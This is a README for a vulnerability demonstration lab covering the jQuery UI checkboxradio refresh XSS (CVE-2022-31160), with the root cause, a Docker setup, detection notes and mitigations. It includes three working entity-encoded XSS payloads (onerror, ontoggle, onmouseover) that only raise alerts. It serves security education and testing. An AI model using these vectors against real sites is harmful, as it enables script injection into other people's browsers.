# jQuery UI CVE-2022-31160 Vulnerability Demonstration

![Security Badge](https://img.shields.io/badge/Security-Vulnerability%20Demo-red)
![jQuery UI](https://img.shields.io/badge/jQuery%20UI-1.13.0-blue)
![CVE](https://img.shields.io/badge/CVE-2022--31160-critical)
![Docker](https://img.shields.io/badge/Docker-Ready-blue)

This project demonstrates the **jQuery UI Checkboxradio Widget Refresh Vulnerability (CVE-2022-31160)**, which allows HTML entity decoding during widget refresh operations, potentially leading to Cross-Site Scripting (XSS) attacks.

## 🚨 Security Warning

**⚠️ This project contains working XSS payloads for educational and research purposes only.**

- **Do NOT use on production systems**
- **Only use in controlled environments**
- **Intended for security research and education**

## 📋 Table of Contents

- [Vulnerability Overview](#vulnerability-overview)
- [Quick Start](#quick-start)
- [Project Structure](#project-structure)
- [Demonstrations](#demonstrations)
- [Technical Details](#technical-details)
- [Docker Usage](#docker-usage)
- [Security Analysis](#security-analysis)
- [Mitigation](#mitigation)
- [Contributing](#contributing)

## 🔍 Vulnerability Overview

### CVE-2022-31160 Details

- **Component**: jQuery UI Checkboxradio Widget
- **Affected Versions**: jQuery UI ≤ 1.13.1
- **Vulnerability Type**: Cross-Site Scripting (XSS) via HTML Entity Decoding
- **CVSS Score**: 6.1 (Medium)
- **First Published**: July 20, 2022

### Root Cause

When a checkboxradio widget is initialized on an input enclosed within a label, calling `.checkboxradio("refresh")` on the widget causes HTML entities in the label content to be erroneously decoded. This can convert safely encoded malicious content into executable JavaScript.

### Attack Vector

```html
<!-- Safe encoded content -->
<label for="checkbox">
  Text &lt;img src=x onerror=&quot;alert('XSS')&quot;&gt;
  <input type="checkbox" id="checkbox">
</label>

<!-- After .checkboxradio("refresh") -->
<label for="checkbox">
  Text <img src=x onerror="alert('XSS')">
  <input type="checkbox" id="checkbox">
</label>
```

## 🚀 Quick Start

### Prerequisites

- Docker installed on your system
- Web browser with developer tools
- Basic understanding of web security concepts

### Build and Run

```bash
# Clone or navigate to the project directory
cd jquery-cve-2022-31160

# Build the Docker image
docker build -t jquery-cve-2022-31160 .

# Run the container
docker run -p 3000:3000 jquery-cve-2022-31160
```

### Access the Demonstrations

Once the container is running, access:

- **Simplified Survey Demo**: http://localhost:3000/survey
- **Alternative Survey URL**: http://localhost:3000/simplified-survey

## 📁 Project Structure

```
jquery-cve-2022-31160/
├── README.md                    # This documentation
├── Dockerfile                   # Docker container configuration
├── package.json                 # Node.js dependencies
├── server.js                    # Express.js server
└── simplified-survey.html       # Survey-style demonstration
```

## 🎯 Demonstrations

### 1. Simplified Survey Demo (`simplified-survey.html`)

**URL**: http://localhost:3000/survey

- Survey-style interface
- Multiple vulnerability scenarios
- Enhanced visual feedback

**Features**:
- 4 different checkbox options demonstrating various scenarios:
  - **Safe Option**: No encoded entities (control group)
  - **Network Security XSS**: `&lt;img src=x onerror=&quot;...&quot;&gt;` - Immediate execution
  - **Mobile Security XSS**: `&lt;details ontoggle=&quot;...&quot; open&gt;` - Immediate execution  
  - **Cloud Security XSS**: `&lt;span onmouseover=&quot;...&quot;&gt;` - Interactive execution

**Analysis Tools**:
- Detailed console logging
- XSS execution alerts
- Step-by-step vulnerability tracking

## 🔧 Technical Details

### Vulnerability Mechanism

1. **Widget Initialization**: jQuery UI creates checkboxradio widget
2. **HTML Entity Storage**: Label content with encoded entities is processed
3. **Refresh Trigger**: `.checkboxradio("refresh")` is called
4. **Entity Decoding**: jQuery UI erroneously decodes HTML entities
5. **XSS Execution**: Decoded malicious content becomes executable

### Affected Code Path

```javascript
// Vulnerable operation
$('#vulnerable-checkbox').checkboxradio();
$('#vulnerable-checkbox').checkboxradio("refresh"); // Triggers vulnerability
```

### Test Payloads

The demonstrations include various payloads to test different XSS execution methods:

```html
<!-- Network Security: Error event XSS (Immediate execution) -->
&lt;img src=x onerror=&quot;console.log('XSS via widget refresh!'); alert('Widget refresh XSS executed!');&quot;&gt;

<!-- Mobile Security: Details toggle XSS (Immediate execution) -->
&lt;details ontoggle=&quot;alert('Mobile Security XSS executed!'); console.log('Mobile XSS via details ontoggle!')&quot; open&gt;&lt;summary&gt;&lt;/summary&gt;&lt;/details&gt;

<!-- Cloud Security: Interactive XSS (User interaction required) -->
&lt;span onmouseover=&quot;alert('Hover XSS executed!'); console.log('Cloud Security XSS via mouseover!')&quot; style=&quot;text-decoration:underline; cursor:pointer;&quot;&gt;[Hover to trigger]&lt;/span&gt;
```

### XSS Execution Methods

#### 1. Error Event Handler (`onerror`)
- **Trigger**: Immediate when element is inserted into DOM
- **Reliability**: Very high (always fails with `src=x`)
- **Use Case**: Demonstrates immediate XSS execution
- **Real-World Risk**: High - commonly bypasses input filters

#### 2. Details Toggle Event Handler (`ontoggle`)
- **Trigger**: When details element open/close state changes
- **Reliability**: Very high (guaranteed trigger with `open` attribute)
- **Use Case**: Immediate execution on DOM insertion
- **Real-World Risk**: High - reliable cross-browser execution

#### 3. Mouse Event Handler (`onmouseover`)
- **Trigger**: Requires user interaction (hover)
- **Reliability**: High when user interacts
- **Use Case**: Social engineering scenarios
- **Real-World Risk**: Medium - requires user engagement

### Why These Payloads Work

**Event Handler Advantages:**
- Execute when element is inserted via `innerHTML`
- Bypass `<script>` tag restrictions
- Work across different browsers consistently
- Don't require external resources to load
- State-based triggers (like `ontoggle`) are highly reliable

**Encoding Bypass:**
- HTML entities (`&lt;`, `&quot;`) get decoded by jQuery UI refresh
- Transforms safe encoded content into executable code
- Demonstrates real-world sanitization bypass
- Multiple execution vectors show attack surface diversity

## 🐳 Docker Usage

### Building the Image

```bash
docker build -t jquery-cve-2022-31160 .
```

### Running the Container

```bash
# Run on default port 3000
docker run -p 3000:3000 jquery-cve-2022-31160

# Run on custom port
docker run -p 8080:3000 jquery-cve-2022-31160

# Run in background
docker run -d -p 3000:3000 jquery-cve-2022-31160

# Run with custom name
docker run --name jquery-xss-demo -p 3000:3000 jquery-cve-2022-31160
```

### Container Management

```bash
# List running containers
docker ps

# Stop the container
docker stop jquery-cve-2022-31160

# Remove the container
docker rm jquery-cve-2022-31160

# Remove the image
docker rmi jquery-cve-2022-31160
```

## 🔬 Security Analysis

### Impact Assessment

- **Severity**: Medium (CVSS 6.1)
- **Attack Complexity**: Low
- **User Interaction**: Required (page interaction)
- **Scope**: Unchanged (same-origin)
- **Confidentiality**: Low impact
- **Integrity**: Low impact
- **Availability**: None

### Real-World Scenarios

This vulnerability can be exploited in applications that:

1. Use jQuery UI checkboxradio widgets
2. Allow user-generated content in labels
3. Sanitize content using HTML entity encoding
4. Programmatically refresh widgets

### Detection Methods

- **Static Analysis**: Search for `.checkboxradio("refresh")` calls
- **Dynamic Analysis**: Monitor HTML content changes during widget operations
- **Automated Scanning**: Use tools that can detect DOM-based XSS
- **Manual Testing**: Test widget refresh with encoded payloads

## 🛡️ Mitigation

### Immediate Actions

1. **Update jQuery UI**: Upgrade to version 1.13.2 or later
2. **Input Validation**: Implement proper server-side validation
3. **Content Security Policy**: Deploy restrictive CSP headers
4. **Output Encoding**: Use context-appropriate output encoding

### Code Fixes

```javascript
// Before refresh, sanitize or validate content
function safeRefresh(element) {
    // Validate label content before refresh
    const label = $(`label[for="${element.attr('id')}"]`);
    const content = label.html();
    
    // Check for potentially dangerous content
    if (content.includes('<') || content.includes('javascript:')) {
        console.warn('Potentially dangerous content detected');
        return;
    }
    
    element.checkboxradio("refresh");
}
```

### Security Headers

```javascript
// Express.js security headers
app.use((req, res, next) => {
    res.setHeader('X-Content-Type-Options', 'nosniff');
    res.setHeader('X-Frame-Options', 'DENY');
    res.setHeader('X-XSS-Protection', '1; mode=block');
    res.setHeader('Content-Security-Policy', "default-src 'self'");
    next();
});
```

## 📚 Educational Value

This project serves as an educational resource for:

- **Security Researchers**: Understanding DOM manipulation vulnerabilities
- **Web Developers**: Learning about jQuery UI security considerations
- **Penetration Testers**: Practical XSS exploitation techniques
- **Security Students**: Hands-on vulnerability analysis

## 🔗 References

- [CVE-2022-31160 Official Entry](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31160)
- [jQuery UI Security Advisory](https://blog.jqueryui.com/2022/07/jquery-ui-1-13-2-released/)
- [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
- [CWE-79: Cross-site Scripting](https://cwe.mitre.org/data/definitions/79.html)

## 📈 Testing Checklist

When using this demonstration:

### Pre-Testing Setup:
- [ ] Verify jQuery UI version (should be 1.13.0)
- [ ] Test with developer tools open (F12)
- [ ] Access survey at http://localhost:3000/survey
- [ ] Check console for initialization messages

### Vulnerability Testing:
- [ ] Click "🔄 Refresh Widgets" button
- [ ] **Network Security Option**: Verify immediate alert execution
- [ ] **Mobile Security Option**: Verify immediate alert execution  
- [ ] **Cloud Security Option**: Hover over "[Hover to trigger]" text
- [ ] Check console for detailed vulnerability logging

### Analysis Verification:
- [ ] Validate XSS payload execution (3 different types)
- [ ] Test widget reset functionality
- [ ] Verify checkbox visual feedback works correctly

## 🤝 Contributing

Contributions are welcome! Please:

1. Fork the repository
2. Create a feature branch
3. Make your changes
4. Add appropriate documentation
5. Submit a pull request

### Areas for Enhancement

- Additional payload examples
- More detailed analysis tools
- Enhanced visual demonstrations

## ⚖️ Legal Disclaimer

This software is provided for educational and research purposes only. The authors and contributors:

- Are not responsible for any misuse of this software
- Do not encourage or condone malicious activities
- Recommend using only in authorized testing environments
- Advise following responsible disclosure practices

## 📄 License

This project is provided under the MIT License for educational purposes.

---

**Created for security research and education** | **Use responsibly** | **Report vulnerabilities through proper channels**
